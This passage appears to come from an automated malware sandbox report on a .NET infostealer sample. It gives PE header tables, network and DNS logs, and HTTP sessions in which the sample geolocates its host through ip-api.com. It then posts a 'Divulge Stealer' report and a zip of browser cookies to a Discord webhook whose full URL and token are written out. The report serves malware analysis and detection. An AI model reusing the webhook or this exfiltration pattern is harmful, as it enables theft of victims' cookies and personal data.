                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2fd0c0x4f.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x300000x550.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x320000xc.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x2fcf00x1c.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x20000x2dd640x2de00dfa34e24ec0ae8fa46925a31adefc1e9False0.38844835660762944data6.0132344968072955IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rsrc0x300000x5500x600f35488c1e24e6c68f25bb08be804abb2False0.4134114583333333data4.5666280949668066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .reloc0x320000xc0x20012806d217d24165bd64fb2dc9424a8d4False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_VERSION0x300a00x2c4data0.4463276836158192
                                                                                                                      RT_MANIFEST0x303640x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                      DLLImport
                                                                                                                      mscoree.dll_CorExeMain
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 5, 2024 18:23:43.499404907 CET4974780192.168.2.9208.95.112.1
                                                                                                                      Dec 5, 2024 18:23:43.619160891 CET8049747208.95.112.1192.168.2.9
                                                                                                                      Dec 5, 2024 18:23:43.619244099 CET4974780192.168.2.9208.95.112.1
                                                                                                                      Dec 5, 2024 18:23:43.619565964 CET4974780192.168.2.9208.95.112.1
                                                                                                                      Dec 5, 2024 18:23:43.739469051 CET8049747208.95.112.1192.168.2.9
                                                                                                                      Dec 5, 2024 18:23:44.735981941 CET8049747208.95.112.1192.168.2.9
                                                                                                                      Dec 5, 2024 18:23:44.776702881 CET4974780192.168.2.9208.95.112.1
                                                                                                                      Dec 5, 2024 18:23:44.897171974 CET8049747208.95.112.1192.168.2.9
                                                                                                                      Dec 5, 2024 18:23:44.897233963 CET4974780192.168.2.9208.95.112.1
                                                                                                                      Dec 5, 2024 18:24:15.229742050 CET49819443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:15.229798079 CET44349819162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:15.232388973 CET49819443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:15.236311913 CET49819443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:15.236329079 CET44349819162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:16.458506107 CET44349819162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:16.458575964 CET49819443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:16.460844040 CET49819443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:16.460855007 CET44349819162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:16.461102009 CET44349819162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:16.462450027 CET49819443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:16.507328033 CET44349819162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:16.850528955 CET49819443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:16.850552082 CET44349819162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:16.895426989 CET44349819162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:16.938580990 CET49819443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:17.216443062 CET44349819162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:17.216530085 CET44349819162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:17.216588974 CET49819443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:17.254296064 CET49819443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:17.255847931 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:17.255891085 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:17.255960941 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:17.256345034 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:17.256365061 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.479099035 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.480657101 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.480674982 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.845345020 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.845366001 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.845441103 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.845447063 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.845614910 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.845623970 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.845688105 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.845691919 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.845789909 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.845798016 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.845861912 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.845868111 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.845959902 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.845966101 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846009016 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846015930 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846065044 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846070051 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846117020 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846123934 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846158028 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846164942 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846210003 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846216917 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846225023 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846232891 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846249104 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846254110 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846287966 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846298933 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846330881 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846337080 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846411943 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846419096 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846451998 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846457958 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846509933 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846515894 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846561909 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846575975 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846585989 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846595049 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846604109 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846610069 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846641064 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846647024 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846681118 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846687078 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846719980 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846724987 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846841097 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846862078 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846874952 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846880913 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846894979 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846903086 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846918106 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846925020 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846961975 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846976995 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.846992970 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.846997976 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.847089052 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.847095966 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.847112894 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.847121000 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.847134113 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.847141981 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.847158909 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.847196102 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.847234011 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.847279072 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.847358942 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.887332916 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.887599945 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.887779951 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.887794018 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.887895107 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.887967110 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.916676998 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.916956902 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.917160988 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.917208910 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.917223930 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:18.963331938 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:18.963525057 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:19.007332087 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:20.278685093 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:20.278779030 CET44349825162.159.135.232192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:20.278845072 CET49825443192.168.2.9162.159.135.232
                                                                                                                      Dec 5, 2024 18:24:20.279537916 CET49825443192.168.2.9162.159.135.232
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 5, 2024 18:23:43.354785919 CET5536253192.168.2.91.1.1.1
                                                                                                                      Dec 5, 2024 18:23:43.498107910 CET53553621.1.1.1192.168.2.9
                                                                                                                      Dec 5, 2024 18:24:15.078597069 CET6168053192.168.2.91.1.1.1
                                                                                                                      Dec 5, 2024 18:24:15.225090027 CET53616801.1.1.1192.168.2.9
                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Dec 5, 2024 18:23:43.354785919 CET192.168.2.91.1.1.10x2cf4Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 5, 2024 18:24:15.078597069 CET192.168.2.91.1.1.10xf2bStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Dec 5, 2024 18:23:24.076896906 CET1.1.1.1192.168.2.90xc548No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 5, 2024 18:23:24.076896906 CET1.1.1.1192.168.2.90xc548No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 5, 2024 18:23:43.498107910 CET1.1.1.1192.168.2.90x2cf4No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                      Dec 5, 2024 18:24:15.225090027 CET1.1.1.1192.168.2.90xf2bNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                      Dec 5, 2024 18:24:15.225090027 CET1.1.1.1192.168.2.90xf2bNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                      Dec 5, 2024 18:24:15.225090027 CET1.1.1.1192.168.2.90xf2bNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                      Dec 5, 2024 18:24:15.225090027 CET1.1.1.1192.168.2.90xf2bNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                      Dec 5, 2024 18:24:15.225090027 CET1.1.1.1192.168.2.90xf2bNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                      • discord.com
                                                                                                                      • ip-api.com
                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.949747208.95.112.1807504C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 5, 2024 18:23:43.619565964 CET79OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                      Host: ip-api.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 5, 2024 18:23:44.735981941 CET381INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 05 Dec 2024 17:23:43 GMT
                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                      Content-Length: 204
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      X-Ttl: 60
                                                                                                                      X-Rl: 44
                                                                                                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 32 32 38 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
                                                                                                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-228.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.228"}


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.949819162.159.135.2324437504C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-05 17:24:16 UTC360OUTPOST /api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG HTTP/1.1
                                                                                                                      Accept: application/json
                                                                                                                      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                      Host: discord.com
                                                                                                                      Content-Length: 887
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-12-05 17:24:16 UTC887OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 44 69 76 75 6c 67 65 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f f0 9f 93 a1 4e 65 74 77 6f 72 6b 20 61 64 64 72 65 73 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5f 5f 2a 2a 5c 6e 60 60 60 70 72 6f 6c 6f 67 5c 6e 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 5c 6e 5c 6e 43 6f 75 6e 74 72 79 3a 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 5c 6e 52 65 67 69 6f 6e 3a 20 4e 65 77 20 59 6f 72 6b 5c 6e 54 69 6d 65 7a 6f 6e 65 3a 20 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 5c 6e 5c 6e 43 65 6c 6c 75 6c 61 72 20 44 61 74 61 3a 20 e2 9d 8e 5c 6e 50 72 6f 78 79 2f 56 50 4e 3a 20 20 20 20 20 e2 9d 8e 5c 6e 5c 6e 60 60 60
                                                                                                                      Data Ascii: {"content":"","embeds":[{"title":"Divulge Stealer","description":"**__Network address information__**\n```prolog\nIP: 8.46.123.228\n\nCountry: United States\nRegion: New York\nTimezone: America/New_York\n\nCellular Data: \nProxy/VPN: \n\n```
                                                                                                                      2024-12-05 17:24:16 UTC25INHTTP/1.1 100 Continue
                                                                                                                      2024-12-05 17:24:17 UTC1304INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 05 Dec 2024 17:24:17 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 45
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                      x-ratelimit-limit: 5
                                                                                                                      x-ratelimit-remaining: 4
                                                                                                                      x-ratelimit-reset: 1733419458
                                                                                                                      x-ratelimit-reset-after: 1
                                                                                                                      via: 1.1 google
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1gVsW50mnsi2U%2BQXe9NxMshj3MQ24pNrfJ3l5v4AP6%2B%2B52JFzIkovEeKbhT6Csk2rn8CsveFSYIVuCuH7Ry8kcKkoCyNki%2F2wVBPOtDRbtFEupMzt%2FclvmLfyGAh"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Set-Cookie: __cfruid=181917c39b8d85f679bb45cd12b4d63c5a4dc2f7-1733419457; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                      Set-Cookie: _cfuvid=g1B4may2JrsF2zOjUVlV6hoyAZ0t1U.NdCEU26Jj4NU-1733419457053-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8ed5ba949e4f1869-EWR
                                                                                                                      {"message": "Unknown Webhook", "code": 10015}


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.949825162.159.135.2324437504C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-05 17:24:18 UTC531OUTPOST /api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG HTTP/1.1
                                                                                                                      Accept: application/json
                                                                                                                      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                                                                                      Content-Type: multipart/form-data; boundary="d31af05b-a089-4598-b9fe-a3c3a1d2e42d"
                                                                                                                      Host: discord.com
                                                                                                                      Cookie: __cfruid=181917c39b8d85f679bb45cd12b4d63c5a4dc2f7-1733419457; _cfuvid=g1B4may2JrsF2zOjUVlV6hoyAZ0t1U.NdCEU26Jj4NU-1733419457053-0.0.1.1-604800000
                                                                                                                      Content-Length: 688763
                                                                                                                      Expect: 100-continue
                                                                                                                      2024-12-05 17:24:18 UTC40OUTData Raw: 2d 2d 64 33 31 61 66 30 35 62 2d 61 30 38 39 2d 34 35 39 38 2d 62 39 66 65 2d 61 33 63 33 61 31 64 32 65 34 32 64 0d 0a
                                                                                                                      Data Ascii: --d31af05b-a089-4598-b9fe-a3c3a1d2e42d
                                                                                                                      2024-12-05 17:24:18 UTC142OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 44 69 76 75 6c 67 65 2d 39 38 30 31 30 38 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 44 69 76 75 6c 67 65 2d 39 38 30 31 30 38 2e 7a 69 70 0d 0a 0d 0a
                                                                                                                      Data Ascii: Content-Type: application/zipContent-Disposition: form-data; name=file; filename=Divulge-980108.zip; filename*=utf-8''Divulge-980108.zip
                                                                                                                      2024-12-05 17:24:18 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 08 08 00 f5 62 85 59 3f 0f b6 3e ec 00 00 00 21 01 00 00 23 00 00 00 42 72 6f 77 73 65 72 73 2f 43 6f 6f 6b 69 65 73 2f 43 68 72 6f 6d 65 20 43 6f 6f 6b 69 65 73 2e 74 78 74 7d cc 41 72 82 30 14 00 d0 75 9c f1 28 d0 fc 84 10 b2 e8 82 4a a0 2a 52 41 ac ca 86 49 15 81 41 a5 a2 44 c6 d3 d7 13 74 de fe 99 65 db 96 a7 c2 dc b7 67 94 26 6b 89 de 90 ef 86 2b 89 80 52 8b 32 9b 00 c6 1c 38 b3 31 82 65 3e 73 13 44 30 a1 06 60 03 33 03 8b f1 c8 fc 27 60 36 77 80 08 f1 0a 6c 20 28 9a 7a 88 01 bc 37 e2 9e d2 2b df 1d 2b b8 0c b9 bf 3a 61 db 67 6b 99 eb 83 f2 e3 ae a8 83 79 01 ca 8b 1c ba 28 74 e1 f1 65 08 49 b6 d5 ca ba 19 17 7f 2f 1e 2a ae 45 78 9f 2b dd a7 d3 1f e5 2c d6 4d 1b f4 cc 91 2f 50 3e 3e f2 74 33 b3 a2 d2 08 8f 13 fd ac 8a 33 ef a2 ae
                                                                                                                      Data Ascii: PKbY?>!#Browsers/Cookies/Chrome Cookies.txt}Ar0u(J*RAIADteg&k+R281e>sD0`3'`6wl (z7++:agky(teI/*Ex+,M/P>>t33
                                                                                                                      2024-12-05 17:24:18 UTC16355OUTData Raw: 3f 25 96 80 8c fe ae 9d e1 40 d4 f9 22 63 c2 c9 19 d2 de 6d 15 03 84 69 65 da 1f 8f da be 39 30 22 3a 12 28 3a e7 8c d8 52 fa 8b ee 7b a5 a4 a7 56 3c db cb a7 eb fe 3c 03 9e 61 a7 6c 52 bf 99 aa b2 78 06 06 e3 c9 9d 34 da 30 13 9f ad d5 d9 99 bf 5b 7c 61 1f f8 4e 26 d1 3d 59 25 fc 26 58 3e ca 08 6e 8f c4 b4 ab 4f 4e f7 cb 69 09 ca 80 d7 09 6a 56 bf bf 82 4e 89 c7 a6 38 31 eb 9f 26 38 70 a6 f1 be 7e 33 b0 71 68 06 aa b4 ff 9b 76 07 7a 2d f4 64 5b ca 03 9b 57 8b ad 32 a1 46 09 46 72 56 0e 50 8d 7e 03 e0 11 ba 78 32 ab 98 4d 25 b3 fe b1 ae dd f5 84 ad 47 f0 cc d9 a4 d5 c5 10 e5 19 d7 98 3b 32 5c f7 38 c6 a2 1c eb e8 cf df 43 ce 97 72 cc bf 7c 2d da cc e7 50 90 d8 20 2a ad 97 eb dd 3e 90 4e 8b 29 ee 2e 3f 95 45 12 b0 d1 dd d6 b3 19 20 0d 3c 8d fb 92 65 fe 58
                                                                                                                      Data Ascii: ?%@"cmie90":(:R{V<<alRx40[|aN&=Y%&X>nONijVN81&8p~3qhvz-d[W2FFrVP~x2M%G;2\8Cr|-P *>N).?E <eX
